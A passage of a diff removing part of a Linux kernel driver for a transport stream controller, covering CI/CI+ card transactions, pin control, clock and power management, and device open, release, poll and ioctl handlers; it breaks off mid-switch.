--			cam_cmd_reg = readl_relaxed(tsc_device->base +
--					TSC_CAM_CMD);
--			SET_BIT(CAM_CMD_ABORT, cam_cmd_reg);
--			writel_relaxed(cam_cmd_reg, tsc_device->base +
--					TSC_CAM_CMD);
--		}
--		goto finish;
--	}
--	mutex_lock(&tsc_ci->mutex);
--
--	/* Checking if transaction ended with error */
--	spin_lock_irqsave(&tsc_ci->spinlock, flags);
--	if (tsc_ci->transaction_state == TRANSACTION_ERROR) {
--		tsc_ci->transaction_state = BEFORE_TRANSACTION;
--		spin_unlock_irqrestore(&tsc_ci->spinlock, flags);
--		pr_err("%s: Transaction error\n", __func__);
--		ret =  -EBADE; /* Invalid exchange error code */
--		goto finish;
--	} else if (tsc_ci->transaction_state == TRANSACTION_CARD_REMOVED) {
--		tsc_ci->transaction_state = BEFORE_TRANSACTION;
--		spin_unlock_irqrestore(&tsc_ci->spinlock, flags);
--		pr_err("%s: Card was removed during the transaction. Aborting\n",
--				__func__);
--		ret = -ECONNABORTED;
--		/* Aborting the transaction if it's buffer mode */
--		if (buff_mode) {
--			cam_cmd_reg = readl_relaxed(tsc_device->base +
--					TSC_CAM_CMD);
--			SET_BIT(CAM_CMD_ABORT, cam_cmd_reg);
--			writel_relaxed(cam_cmd_reg, tsc_device->base +
--					TSC_CAM_CMD);
--		}
--		goto finish;
--	}
--
--	/* reseting the argument after reading the interrupt type */
--	tsc_ci->transaction_state = BEFORE_TRANSACTION;
--	spin_unlock_irqrestore(&tsc_ci->spinlock, flags);
--
--	/*
--	 * Only on case of read single byte operation, we need to copy the data
--	 * to the arg data field
--	 */
--	if (buff_mode == SINGLE_BYTE_MODE && read_write == READ_TRANSACTION)
--		ret = put_user(readl_relaxed(tsc_device->base +
--				TSC_CAM_RD_DATA),
--				&((struct tsc_single_byte_mode *)arg)->data);
--
--finish:
--	if (iova != 0)
--		ion_unmap_iommu(tsc_device->iommu_info.ion_client, ion_handle,
--			tsc_device->iommu_info.domain_num,
--			tsc_device->iommu_info.partition_num);
--err_ion_map:
--	if (!IS_ERR_OR_NULL(ion_handle))
--		ion_free(tsc_device->iommu_info.ion_client, ion_handle);
--err_ion_handle:
--err_copy_arg:
--	tsc_ci->data_busy = false;
--	INIT_COMPLETION(tsc_ci->transaction_complete);
--	complete_all(&tsc_ci->transaction_finish);
--	return ret;
--}
--
--/**
-- * tsc_personality_change() - change the PCMCIA pins state.
-- *
-- * @pcmcia_state:	The new state of the PCMCIA pins.
-- *
-- * Configure the TLMM pins of the PCMCIA according to received state and
-- * the current pinctrl configuration of the other pins. This function assums the
-- * PCMCIA pinctrl definitions were successfully parsed from the devicetree (this
-- * check is done at open device).
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int tsc_personality_change(enum tsc_cam_personality pcmcia_state)
--{
--	int ret = 0;
--	struct pinctrl_info *ppinctrl = &tsc_device->pinctrl_info;
--	struct pinctrl_current_state *pcurr_state = &ppinctrl->curr_state;
--	u32 reg = 0;
--
--	if (mutex_lock_interruptible(&tsc_device->mutex))
--		return -ERESTARTSYS;
--
--	if (pcmcia_state == (enum tsc_cam_personality)pcurr_state->pcmcia_state)
--		goto exit;
--
--	/* Transition from current pinctrl state to curr + new pcmcia state */
--	switch (pcmcia_state) {
--	case TSC_CICAM_PERSONALITY_CI:
--		if (pcurr_state->ts0 && pcurr_state->ts1)
--			ret = pinctrl_select_state(ppinctrl->pinctrl,
--					ppinctrl->dual_ts_ci_card);
--		else if (pcurr_state->ts0 && !pcurr_state->ts1)
--			ret = pinctrl_select_state(ppinctrl->pinctrl,
--					ppinctrl->ts0_ci_card);
--		else if (!pcurr_state->ts0 && pcurr_state->ts1)
--			ret = pinctrl_select_state(ppinctrl->pinctrl,
--					ppinctrl->ts1_ci_card);
--		else
--			ret = pinctrl_select_state(ppinctrl->pinctrl,
--					ppinctrl->ci_card);
--		break;
--	case TSC_CICAM_PERSONALITY_CIPLUS:
--		if (pcurr_state->ts0 && pcurr_state->ts1)
--			ret = pinctrl_select_state(ppinctrl->pinctrl,
--					ppinctrl->dual_ts_ci_plus);
--		else if (pcurr_state->ts0 && !pcurr_state->ts1)
--			ret = pinctrl_select_state(ppinctrl->pinctrl,
--					ppinctrl->ts0_ci_plus);
--		else if (!pcurr_state->ts0 && pcurr_state->ts1)
--			ret = pinctrl_select_state(ppinctrl->pinctrl,
--					ppinctrl->ts1_ci_plus);
--		else
--			ret = pinctrl_select_state(ppinctrl->pinctrl,
--					ppinctrl->ci_plus);
--		break;
--	case TSC_CICAM_PERSONALITY_DISABLE:
--		if (pcurr_state->ts0 && pcurr_state->ts1)
--			ret = pinctrl_select_state(ppinctrl->pinctrl,
--					ppinctrl->dual_ts);
--		else if (pcurr_state->ts0 && !pcurr_state->ts1)
--			ret = pinctrl_select_state(ppinctrl->pinctrl,
--					ppinctrl->ts0);
--		else if (!pcurr_state->ts0 && pcurr_state->ts1)
--			ret = pinctrl_select_state(ppinctrl->pinctrl,
--					ppinctrl->ts1);
--		else
--			ret = pinctrl_select_state(ppinctrl->pinctrl,
--					ppinctrl->disable);
--		break;
--	default:
--		pr_err("%s: Wrong personality parameter\n", __func__);
--		ret = -EINVAL;
--		goto exit;
--	}
--
--	if (ret != 0) {
--		pr_err("%s: error changing PCMCIA pins. ret value = %d\n",
--			__func__, ret);
--		ret = -EINVAL;
--		goto exit;
--	}
--
--	/* Update the current pcmcia state in the internal struct */
--	pcurr_state->pcmcia_state = (enum pcmcia_state)pcmcia_state;
--
--	/*
--	 * Setting CAM TSIF OE to enable I/O transactions for CI/+ cards
--	 * or clearing it when moving to disable state
--	 */
--	if (TSC_CICAM_PERSONALITY_CI == pcmcia_state ||
--			TSC_CICAM_PERSONALITY_CIPLUS == pcmcia_state) {
--		SET_BIT(TSC_CICAM_TSIF_OE_OFFS, reg);
--		writel_relaxed(reg, tsc_device->base + TSC_CICAM_TSIF);
--	} else {
--		CLEAR_BIT(TSC_CICAM_TSIF_OE_OFFS, reg);
--		writel_relaxed(reg, tsc_device->base + TSC_CICAM_TSIF);
--	}
--
--exit:
--	mutex_unlock(&tsc_device->mutex);
--	return ret;
--}
--
--/**
-- * tsc_reset_cam() - HW reset to the CAM.
-- *
-- * Toggle the reset pin of the pcmcia to make a HW reset.
-- * This function assumes that pinctrl_select_state was already called on the
-- * reset pin with its active state (happens during personality change).
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int tsc_reset_cam(void)
--{
--	int ret;
--	int reset_gpio = tsc_device->reset_cam_gpio;
--
--	/* Toggle the GPIO to create a reset pulse */
--	ret = gpio_direction_output(reset_gpio, 0); /* Make sure it's 0 */
--	if (ret != 0)
--		goto err;
--
--	ret = gpio_direction_output(reset_gpio, 1); /* Assert */
--	if (ret != 0)
--		goto err;
--
--	/*
--	 * Waiting to enable the CAM to process the assertion before the
--	 * deassertion. 1ms is needed for this processing.
--	 */
--	usleep(1000);
--
--	ret = gpio_direction_output(reset_gpio, 0); /* Deassert */
--	if (ret != 0)
--		goto err;
--
--	return 0;
--err:
--	pr_err("%s: Failed writing to reset cam GPIO\n", __func__);
--	return ret;
--}
--
--/**
-- * tsc_reset_registers() - Reset the TSC registers.
-- *
-- * Write specific reset values to the TSC registers, managed by the driver.
-- */
--static void tsc_reset_registers(void)
--{
--	/* Reset state - all mux transfer ext. demod 0 */
--	writel_relaxed(0x00000000, tsc_device->base + TSC_MUX_CFG);
--
--	/* Disabling TSIFs inputs, putting polarity to normal, data as serial */
--	writel_relaxed(0x02000200, tsc_device->base + TSC_IN_IFC_EXT);
--	writel_relaxed(0x02000200, tsc_device->base + TSC_IN_IFC_CFG_INT);
--
--	/* Reseting TSC_FSM_STATE_MASK to represent all the states but poll */
--	writel_relaxed(0x3333300F, tsc_device->base + TSC_FSM_STATE_MASK);
--
--	/* Clearing all the CAM interrupt */
--	writel_relaxed(0x1F, tsc_device->base + TSC_IRQ_CLR);
--
--	/* Disabling all cam interrupts (enable is done at - open) */
--	writel_relaxed(0x00, tsc_device->base + TSC_IRQ_ENA);
--
--	/* Disabling HW polling */
--	writel_relaxed(0x00, tsc_device->base + TSC_CIP_CFG);
--
--	/* Reset state - address for read/write buffer */
--	writel_relaxed(0x00000000, tsc_device->base + TSC_RD_BUFF_ADDR);
--	writel_relaxed(0x00000000, tsc_device->base + TSC_WR_BUFF_ADDR);
--
--	/* Clearing false cd counter */
--	writel_relaxed(0x01, tsc_device->base + TSC_FALSE_CD_CLR);
--	writel_relaxed(0x00, tsc_device->base + TSC_FALSE_CD_CLR);
--
--	/* Disabling TSIF out to cicam and IO read/write with the CAM */
--	writel_relaxed(0x00000000, tsc_device->base + TSC_CICAM_TSIF);
--}
--
--/**
-- * tsc_disable_tsifs() - Disable all the TSC Tsifs.
-- *
-- * Disable the TSIFs of the ext. demods, the int. demod and the cam on both
-- * directions.
-- */
--static void tsc_disable_tsifs(void)
--{
--	u32 reg;
--
--	/* Ext. TSIFs */
--	reg = readl_relaxed(tsc_device->base + TSC_IN_IFC_EXT);
--	SET_BIT(TSIF_DISABLE_OFFS, reg);
--	SET_BIT((TSIF_DISABLE_OFFS + 16), reg);
--	writel_relaxed(reg, tsc_device->base + TSC_IN_IFC_EXT);
--
--	/* Int. TSIF and TSIF-in from the CAM */
--	reg = readl_relaxed(tsc_device->base + TSC_IN_IFC_CFG_INT);
--	SET_BIT(TSIF_DISABLE_OFFS, reg);
--	SET_BIT((TSIF_DISABLE_OFFS + 16), reg);
--	writel_relaxed(reg, tsc_device->base + TSC_IN_IFC_CFG_INT);
--}
--
--/**
-- * tsc_power_on_clocks() - power-on the TSC clocks.
-- *
-- * Power-on the TSC clocks required for Mux and/or CI operations.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int tsc_power_on_clocks(void)
--{
--	int ret = 0;
--	unsigned long rate_in_hz = 0;
--
--	/* Enabling the clocks */
--	ret = clk_prepare_enable(tsc_device->ahb_clk);
--	if (ret != 0) {
--		pr_err("%s: Can't start tsc_ahb_clk", __func__);
--		return ret;
--	}
--
--	/* We need to set the rate of ci clock before enabling it */
--	rate_in_hz = clk_round_rate(tsc_device->ci_clk, 1);
--	if (clk_set_rate(tsc_device->ci_clk, rate_in_hz)) {
--		pr_err("%s: Failed to set rate to tsc_ci clock\n", __func__);
--		goto err;
--	}
--
--	ret = clk_prepare_enable(tsc_device->ci_clk);
--	if (ret != 0) {
--		pr_err("%s: Can't start tsc_ci_clk", __func__);
--		goto err;
--	}
--
--	return ret;
--err:
--	clk_disable_unprepare(tsc_device->ahb_clk);
--	return ret;
--}
--
--/**
-- * tsc_power_off_clocks() - power-off the TSC clocks.
-- *
-- * Power-off the TSC clocks required for Mux and/or CI operations.
-- */
--static void tsc_power_off_clocks(void)
--{
--	clk_disable_unprepare(tsc_device->ahb_clk);
--	clk_disable_unprepare(tsc_device->ci_clk);
--}
--
--/**
-- * tsc_mux_power_on_clocks() - power-on the TSC Mux clocks.
-- *
-- * Power-on the TSC clocks required only for Mux operations, and not for CI.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int tsc_mux_power_on_clocks(void)
--{
--	int ret = 0;
--
--	/* Setting the cicam clock rate */
--	ret = clk_set_rate(tsc_device->cicam_ts_clk, CICAM_CLK_RATE_7MHZ);
--	if (ret != 0) {
--		pr_err("%s: Can't set rate for tsc_cicam_ts_clk", __func__);
--		goto err_set_rate;
--	}
--
--	/* Setting the TSC serial clock rate */
--	ret = clk_set_rate(tsc_device->ser_clk, TSC_SER_CLK_RATE);
--	if (ret != 0) {
--		pr_err("%s: Can't set rate for tsc serial clock", __func__);
--		goto err_set_rate;
--	}
--
--	/* Setting the TSC parallel clock rate */
--	ret = clk_set_rate(tsc_device->par_clk, TSC_PAR_CLK_RATE);
--	if (ret != 0) {
--		pr_err("%s: Can't set rate for tsc parallel clock", __func__);
--		goto err_set_rate;
--	}
--
--	/* Enabling the clocks */
--	ret = clk_prepare_enable(tsc_device->ser_clk);
--	if (ret != 0) {
--		pr_err("%s: Can't start tsc_ser_clk", __func__);
--		goto err_ser_clk;
--	}
--	ret = clk_prepare_enable(tsc_device->par_clk);
--	if (ret != 0) {
--		pr_err("%s: Can't start tsc_par_clk", __func__);
--		goto err_par_clk;
--	}
--	ret = clk_prepare_enable(tsc_device->cicam_ts_clk);
--	if (ret != 0) {
--		pr_err("%s: Can't start tsc_cicam_ts_clk", __func__);
--		goto err_cicam_ts_clk;
--	}
--
--	return ret;
--
--err_cicam_ts_clk:
--	clk_disable_unprepare(tsc_device->par_clk);
--err_par_clk:
--	clk_disable_unprepare(tsc_device->ser_clk);
--err_ser_clk:
--err_set_rate:
--	return ret;
--}
--
--/**
-- * tsc_mux_power_off_clocks() - power-off the TSC Mux clocks.
-- *
-- * Power-off the TSC clocks required only for Mux operations, and not for CI.
-- */
--static void tsc_mux_power_off_clocks(void)
--{
--	clk_disable_unprepare(tsc_device->ser_clk);
--	clk_disable_unprepare(tsc_device->par_clk);
--	clk_disable_unprepare(tsc_device->cicam_ts_clk);
--}
--
--/**
-- * tsc_device_power_up() - Power init done by the first device opened.
-- *
-- * Check if it's the first device and enable the GDSC,power-on the TSC clocks
-- * required for both Mux and CI, Vote for the bus and reset the registers to a
-- * known default values.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int tsc_device_power_up(void)
--{
--	int ret = 0;
--
--	if (mutex_lock_interruptible(&tsc_device->mutex))
--		return -ERESTARTSYS;
--
--	if (tsc_device->num_device_open > 0)
--		goto not_first_device;
--
--	/* Enable the GDSC */
--	ret = regulator_enable(tsc_device->gdsc);
--	if (ret != 0) {
--		pr_err("%s: Failed to enable regulator\n", __func__);
--		goto err_regulator;
--	}
--
--	/* Power-on the clocks needed by Mux and CI */
--	ret = tsc_power_on_clocks();
--	if (ret != 0)
--		goto err_power_clocks;
--
--	/* Voting for bus bandwidth */
--	if (tsc_device->bus_client) {
--		ret = msm_bus_scale_client_update_request
--				(tsc_device->bus_client, 1);
--		if (ret) {
--			pr_err("%s: Can't enable bus\n", __func__);
--			goto err_bus;
--		}
--	}
--
--	/* Reset the TSC TLMM pins to a default state */
--	ret = pinctrl_select_state(tsc_device->pinctrl_info.pinctrl,
--			tsc_device->pinctrl_info.disable);
--	if (ret != 0) {
--		pr_err("%s: Failed to disable the TLMM pins\n", __func__);
--		goto err_pinctrl;
--	}
--	/* Update the current pinctrl state in the internal struct */
--	tsc_device->pinctrl_info.curr_state.ts0 = false;
--	tsc_device->pinctrl_info.curr_state.ts1 = false;
--	tsc_device->pinctrl_info.curr_state.pcmcia_state =
--			TSC_CICAM_PERSONALITY_DISABLE;
--
--	/* Reset TSC registers to a default known state */
--	tsc_reset_registers();
--
--not_first_device:
--	tsc_device->num_device_open++;
--	mutex_unlock(&tsc_device->mutex);
--	return ret;
--
--err_pinctrl:
--	if (tsc_device->bus_client)
--		msm_bus_scale_client_update_request(tsc_device->bus_client, 0);
--err_bus:
--	tsc_power_off_clocks();
--err_power_clocks:
--	regulator_disable(tsc_device->gdsc);
--err_regulator:
--	mutex_unlock(&tsc_device->mutex);
--	return ret;
--}
--
--/**
-- * tsc_device_power_off() - Power off done by the last device closed.
-- *
-- * Check if it's the last device and unvote the bus, power-off the TSC clocks
-- * required for both Mux and CI, disable the TLMM pins and disable the GDSC.
-- */
--static void tsc_device_power_off(void)
--{
--	mutex_lock(&tsc_device->mutex);
--
--	if (tsc_device->num_device_open > 1)
--		goto not_last_device;
--
--	pinctrl_select_state(tsc_device->pinctrl_info.pinctrl,
--			tsc_device->pinctrl_info.disable);
--	if (tsc_device->bus_client)
--		msm_bus_scale_client_update_request(tsc_device->bus_client, 0);
--
--	tsc_power_off_clocks();
--	regulator_disable(tsc_device->gdsc);
--
--not_last_device:
--	tsc_device->num_device_open--;
--	mutex_unlock(&tsc_device->mutex);
--}
--
--
--/************************** TSC file operations **************************/
--/**
-- * tsc_mux_open() - init the TSC Mux char device.
-- *
-- * @inode:	The inode associated with the TSC Mux device.
-- * @flip:	The file pointer associated with the TSC Mux device.
-- *
-- * Enables only one open Mux device.
-- * Init all the data structures and vote for all the power resources needed.
-- * Manage reference counters for initiating resources upon first open.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int tsc_mux_open(struct inode *inode, struct file *filp)
--{
--	struct tsc_mux_chdev *tsc_mux;
--	int ret = 0;
--	u32 ena_reg;
--
--	if (mutex_lock_interruptible(&tsc_device->mux_chdev.mutex))
--		return -ERESTARTSYS;
--
--	if (tsc_device->num_mux_opened > 0) {
--		pr_err("%s: Too many devices open\n", __func__);
--		mutex_unlock(&tsc_device->mux_chdev.mutex);
--		return -EMFILE;
--	}
--	tsc_device->num_mux_opened++;
--
--	tsc_mux = container_of(inode->i_cdev, struct tsc_mux_chdev, cdev);
--	filp->private_data = tsc_mux;
--
--	/* Init all resources if it's the first device (checked inside) */
--	ret = tsc_device_power_up();
--	if (ret != 0)
--		goto err_first_device;
--
--	/* Power-on the Mux clocks */
--	ret = tsc_mux_power_on_clocks();
--	if (ret != 0)
--		goto err_mux_clocks;
--
--	/* Init TSC Mux args */
--	spin_lock_init(&tsc_mux->spinlock);
--	init_waitqueue_head(&tsc_mux->poll_queue);
--	tsc_mux->rate_interrupt = false;
--
--	/* Enabling TSC Mux cam interrupt of rate mismatch */
--	ena_reg = readl_relaxed(tsc_device->base + TSC_IRQ_ENA);
--	SET_BIT(CAM_IRQ_RATE_MISMATCH_OFFS, ena_reg);
--	writel_relaxed(ena_reg, tsc_device->base + TSC_IRQ_ENA);
--
--	mutex_unlock(&tsc_device->mux_chdev.mutex);
--
--	return ret;
--
--err_mux_clocks:
--	/* De-init all resources if it's the only device (checked inside) */
--	tsc_device_power_off();
--err_first_device:
--	tsc_device->num_mux_opened--;
--	mutex_unlock(&tsc_device->mux_chdev.mutex);
--	return ret;
--}
--
--/**
-- * tsc_ci_open() - init the TSC CI char device.
-- *
-- * @inode:	The inode associated with the TSC Mux device.
-- * @flip:	The file pointer associated with the TSC Mux device.
-- *
-- * Enables only one open CI device.
-- * Init all the data structures and vote for all the power resources needed.
-- * Manage reference counters for initiating resources upon first open.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int tsc_ci_open(struct inode *inode, struct file *filp)
--{
--	struct tsc_ci_chdev *tsc_ci;
--	int ret = 0;
--	u32 ena_reg;
--
--	if (mutex_lock_interruptible(&tsc_device->ci_chdev.mutex))
--		return -ERESTARTSYS;
--
--	if (tsc_device->num_ci_opened > 0) {
--		pr_err("%s: Too many devices open\n", __func__);
--		mutex_unlock(&tsc_device->ci_chdev.mutex);
--		return -EMFILE;
--	}
--
--	if (!tsc_device->pinctrl_info.is_pcmcia) {
--		pr_err("%s: No pcmcia pinctrl definitions were found in the TSC devicetree\n",
--				__func__);
--		mutex_unlock(&tsc_device->ci_chdev.mutex);
--		return -EPERM;
--	}
--
--	tsc_device->num_ci_opened++;
--
--	tsc_ci = container_of(inode->i_cdev, struct tsc_ci_chdev, cdev);
--	filp->private_data = tsc_ci;
--
--	/* Init all resources if it's the first device (checked inside) */
--	ret = tsc_device_power_up();
--	if (ret != 0)
--		goto err_first_device;
--
--	/* powering-up the tspp2 and VBIF clocks */
--	ret = tsc_power_on_buff_mode_clocks();
--	if (ret != 0)
--		goto err_buff_clocks;
--
--	/* Request reset CAM GPIO */
--	ret = gpio_request(tsc_device->reset_cam_gpio, "tsc_ci_reset");
--	if (ret != 0) {
--		pr_err("%s: Failed to request reset CAM GPIO\n", __func__);
--		goto err_gpio_req;
--	}
--
--	/* Set the reset line to default "no card" state */
--	ret = gpio_direction_output(tsc_device->reset_cam_gpio, 1);
--	if (ret != 0) {
--		pr_err("%s: Failed to assert the reset CAM GPIO\n", __func__);
--		goto err_assert;
--	}
--
--	/* Attach the iommu group to support the required memory mapping */
--	if (!tsc_iommu_bypass) {
--		ret = iommu_attach_group(tsc_device->iommu_info.domain,
--				tsc_device->iommu_info.group);
--		if (ret != 0) {
--			pr_err("%s: iommu_attach_group failed\n", __func__);
--			goto err_iommu_attach;
--		}
--	}
--
--	/* Init TSC CI args */
--	spin_lock_init(&tsc_ci->spinlock);
--	init_waitqueue_head(&tsc_ci->poll_queue);
--	tsc_ci->transaction_state = BEFORE_TRANSACTION;
--	tsc_ci->data_busy = false;
--	tsc_device->card_power = false;
--
--	/*
--	 * Init hw card status flag according to the pins' state.
--	 * No need to protect from interrupt because the handler is not
--	 * registred yet.
--	 */
--	tsc_update_hw_card_status();
--	tsc_ci->card_status = tsc_device->hw_card_status;
--
--	/* If a card is already inserted - need to power up the card */
--	if (tsc_device->hw_card_status == TSC_CARD_STATUS_DETECTED) {
--		ret = tsc_card_power_up();
--		if (ret != 0)
--			pr_err("%s: card power-up failed\n", __func__);
--		else
--			tsc_device->card_power = true;
--	}
--
--	/* Enabling the TSC CI cam interrupts: EOT and Err */
--	ena_reg = readl_relaxed(tsc_device->base + TSC_IRQ_ENA);
--	SET_BIT(CAM_IRQ_EOT_OFFS, ena_reg);
--	SET_BIT(CAM_IRQ_ERR_OFFS, ena_reg);
--	writel_relaxed(ena_reg, tsc_device->base + TSC_IRQ_ENA);
--
--	/* Registering the CAM cmd interrupt handler */
--	ret = request_irq(tsc_device->cam_cmd_irq, tsc_cam_cmd_irq_handler,
--			IRQF_SHARED, dev_name(&tsc_device->pdev->dev),
--			tsc_device);
--	if (ret) {
--		pr_err("%s: failed to request TSC IRQ %d : %d",
--				__func__, tsc_device->cam_cmd_irq, ret);
--		goto err_cam_irq;
--	}
--
--	/*
--	 * Registering the card detect interrupt handler (this interrupt is
--	 * enabled by default, right after this registration)
--	 */
--	ret = request_threaded_irq(tsc_device->card_detection_irq,
--			NULL, tsc_card_detect_irq_thread_handler,
--			IRQF_ONESHOT | IRQF_TRIGGER_RISING,
--			dev_name(&tsc_device->pdev->dev), tsc_device);
--	if (ret) {
--		pr_err("%s: failed to request TSC IRQ %d : %d",
--				__func__, tsc_device->card_detection_irq, ret);
--		goto err_card_irq;
--	}
--
--	mutex_unlock(&tsc_device->ci_chdev.mutex);
--
--	return ret;
--
--err_card_irq:
--	free_irq(tsc_device->cam_cmd_irq, tsc_device);
--err_cam_irq:
--	if (!tsc_iommu_bypass)
--		iommu_detach_group(tsc_device->iommu_info.domain,
--				tsc_device->iommu_info.group);
--err_iommu_attach:
--	gpio_free(tsc_device->reset_cam_gpio);
--err_assert:
--err_gpio_req:
--	tsc_power_off_buff_mode_clocks();
--err_buff_clocks:
--	/* De-init all resources if it's the only device (checked inside) */
--	tsc_device_power_off();
--err_first_device:
--	tsc_device->num_ci_opened--;
--	mutex_unlock(&tsc_device->ci_chdev.mutex);
--	return ret;
--}
--
--/**
-- * tsc_mux_release() - Release and close the TSC Mux char device.
-- *
-- * @inode:	The inode associated with the TSC Mux device.
-- * @flip:	The file pointer associated with the TSC Mux device.
-- *
-- * Release all the resources allocated for the Mux device and unvote power
-- * resources.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int tsc_mux_release(struct inode *inode, struct file *filp)
--{
--	struct tsc_mux_chdev *tsc_mux;
--	u32 ena_reg;
--
--	tsc_mux = filp->private_data;
--	if (!tsc_mux)
--		return -EINVAL;
--
--	mutex_lock(&tsc_mux->mutex);
--
--	tsc_mux_power_off_clocks();
--
--	/* Disable the TSIFs */
--	tsc_disable_tsifs();
--	/* Disabling rate mismatch interrupt */
--	ena_reg = readl_relaxed(tsc_device->base + TSC_IRQ_ENA);
--	CLEAR_BIT(CAM_IRQ_RATE_MISMATCH_OFFS, ena_reg);
--	writel_relaxed(ena_reg, tsc_device->base + TSC_IRQ_ENA);
--
--	tsc_device_power_off();
--
--	tsc_device->num_mux_opened--;
--	mutex_unlock(&tsc_mux->mutex);
--
--	return 0;
--}
--
--/**
-- * tsc_ci_release() - Release and close the TSC CI char device.
-- *
-- * @inode:	The inode associated with the TSC CI device.
-- * @flip:	The file pointer associated with the TSC CI device.
-- *
-- * Release all the resources allocated for the CI device and unvote power
-- * resources.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int tsc_ci_release(struct inode *inode, struct file *filp)
--{
--	struct tsc_ci_chdev *tsc_ci;
--	u32 ena_reg;
--	int ret;
--
--	tsc_ci = filp->private_data;
--	if (!tsc_ci)
--		return -EINVAL;
--
--	mutex_lock(&tsc_ci->mutex);
--
--	/* If in the middle of a data transaction- wake-up completion */
--	if (tsc_ci->data_busy) {
--		/* Closing the device is similar in behavior to card removal */
--		tsc_ci->transaction_state = TRANSACTION_CARD_REMOVED;
--		mutex_unlock(&tsc_ci->mutex);
--		complete_all(&tsc_ci->transaction_complete);
--		wait_for_completion(&tsc_ci->transaction_finish);
--		mutex_lock(&tsc_ci->mutex);
--	}
--
--	/* clearing EOT and ERR interrupts */
--	ena_reg = readl_relaxed(tsc_device->base + TSC_IRQ_ENA);
--	CLEAR_BIT(CAM_IRQ_EOT_OFFS, ena_reg);
--	CLEAR_BIT(CAM_IRQ_ERR_OFFS, ena_reg);
--	writel_relaxed(ena_reg, tsc_device->base + TSC_IRQ_ENA);
--
--	/* Cancel the  interrupt handlers registration */
--	free_irq(tsc_device->card_detection_irq, tsc_device);
--	free_irq(tsc_device->cam_cmd_irq, tsc_device);
--
--	/* power down the card interface if it's currently powered up */
--	if (tsc_device->hw_card_status == TSC_CARD_STATUS_DETECTED &&
--			tsc_device->card_power) {
--		ret = tsc_card_power_down();
--		if (ret != 0)
--			pr_err("%s: card power-down failed\n", __func__);
--	}
--
--	if (!tsc_iommu_bypass)
--		iommu_detach_group(tsc_device->iommu_info.domain,
--				tsc_device->iommu_info.group);
--
--	gpio_free(tsc_device->reset_cam_gpio);
--
--	tsc_power_off_buff_mode_clocks();
--	tsc_device_power_off();
--
--	tsc_device->num_ci_opened--;
--	mutex_unlock(&tsc_ci->mutex);
--
--	return 0;
--}
--
--/**
-- * tsc_mux_poll() - Perform polling on a designated wait-queue.
-- *
-- * @flip:	The file pointer associated with the TSC Mux device.
-- * @p:		The poll-table struct of the kernel.
-- *
-- * Add the TSC Mux wait-queue to the poll-table. Poll until a rate mismatch
-- * interrupt is received.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static unsigned int tsc_mux_poll(struct file *filp, struct poll_table_struct *p)
--{
--	unsigned long flags;
--	unsigned int mask = 0;
--	struct tsc_mux_chdev *tsc_mux;
--
--	tsc_mux = filp->private_data;
--	if (!tsc_mux)
--		return -EINVAL;
--
--	/* register the wait queue for rate mismatch interrupt */
--	poll_wait(filp, &tsc_mux->poll_queue, p);
--
--	/* Setting the mask upon rate mismatch irq and clearing the flag */
--	spin_lock_irqsave(&tsc_mux->spinlock, flags);
--	if (tsc_mux->rate_interrupt) {
--		mask = POLLPRI;
--		tsc_mux->rate_interrupt = false;
--	}
--	spin_unlock_irqrestore(&tsc_mux->spinlock, flags);
--
--	return mask;
--}
--
--/**
-- * tsc_ci_poll() - Perform polling on a designated wait-queue.
-- *
-- * @flip:	The file pointer associated with the TSC CI device.
-- * @p:		The poll-table struct of the kernel.
-- *
-- * Add the TSC Mux wait-queue to the poll-table. Poll until a card detection
-- * interrupt is received.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static unsigned int tsc_ci_poll(struct file *filp, struct poll_table_struct *p)
--{
--	unsigned int mask = 0;
--
--	struct tsc_ci_chdev *tsc_ci = filp->private_data;
--	if (!tsc_ci)
--		return -EINVAL;
--
--	/* Register the wait queue for card detection interrupt */
--	poll_wait(filp, &tsc_ci->poll_queue, p);
--
--	/* Setting the mask upon card detect irq and update ci card state */
--	if (mutex_lock_interruptible(&tsc_ci->mutex))
--		return -ERESTARTSYS;
--	if (tsc_ci->card_status != tsc_device->hw_card_status) {
--		mask = POLLPRI;
--		tsc_ci->card_status = tsc_device->hw_card_status;
--	}
--	mutex_unlock(&tsc_ci->mutex);
--
--	return mask;
--}
--
--/**
-- * tsc_mux_ioctl() - Handle IOCTLs sent from user-space application.
-- *
-- * @flip:	The file pointer associated with the TSC Mux device.
-- * @cmd:	The IOCTL code sent
-- * @arg:	The IOCTL argument (if the IOCTL receives an argument)
-- *
-- * Verify the validity of the IOCTL sent and handle it by updating the
-- * appropriate register or calling a function that handle the IOCTL operation.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static long tsc_mux_ioctl(struct file *filp,
--		unsigned int cmd,
--		unsigned long arg)
--{
--	int ret = 0;
--	struct tsc_mux_chdev *tsc_mux;
--	struct tsc_route tsc_route;
--	struct tsc_tsif_params tsif_params;
--
--	tsc_mux = filp->private_data;
--	if (!tsc_mux)
--		return -EINVAL;
--
--	if (mutex_lock_interruptible(&tsc_mux->mutex))
--		return -ERESTARTSYS;
--
--	switch (cmd) {
--	case TSC_CONFIG_ROUTE:
--		if (!arg || copy_from_user(&tsc_route, (void *)arg,
--				sizeof(struct tsc_route))) {
--			ret = -EFAULT;
--			goto err;
--		}
--		ret = tsc_route_mux(tsc_mux, tsc_route.source, tsc_route.dest);
--		break;
--	case TSC_ENABLE_INPUT:
--		ret = tsc_enable_disable_tsif(tsc_mux, arg, TSIF_INPUT_ENABLE);
--		break;
--	case TSC_DISABLE_INPUT:
--		ret = tsc_enable_disable_tsif(tsc_mux, arg, TSIF_INPUT_DISABLE);
--		break;
--	case TSC_SET_TSIF_CONFIG:
--		if (!arg || copy_from_user(&tsif_params, (void *)arg,
--				sizeof(struct tsc_tsif_params))) {
--			ret = -EFAULT;
--			goto err;
--		}
--		ret = tsc_config_tsif(tsc_mux, &tsif_params);
--		break;
--	case TSC_CLEAR_RATE_MISMATCH_IRQ:
--		tsc_enable_rate_irq(tsc_mux);
--		break;
--	case TSC_CICAM_SET_CLOCK:
--		ret = tsc_set_cicam_clk(arg);
--		break;
--	default:
--		ret = -EINVAL;
